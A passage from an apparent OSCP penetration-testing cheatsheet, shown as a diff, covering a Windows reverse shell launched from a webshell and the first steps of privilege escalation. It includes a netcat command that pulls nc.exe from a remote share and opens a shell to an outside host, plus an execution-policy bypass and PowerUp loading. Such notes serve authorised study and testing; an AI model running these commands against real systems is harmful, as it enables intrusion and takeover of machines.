airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/A. Full Guide (Enumeration to Priv Escalation).md

 5. in a webshell windows, `\\192.168.119.159\share\nc.exe -e cmd.exe 192.168.119.159 123`

  # Privilege Escalation for Window
- 0. `whoami` `systeminfo` `whoami /priv` Conduct basic enumeration, and look for interesting files in the directory
+ 0. `whoami` `systeminfo` `whoami /priv` `whoami /groups' Conduct basic enumeration, and look for interesting files in the directory
  1. Transfer the file to Window to TMP directory using any of the above methods.
  2. Use PowerUp. `powershell -ep bypass`
  3. `Import-Module .\PowerUp.ps1` or `. .\PowerUp.ps1`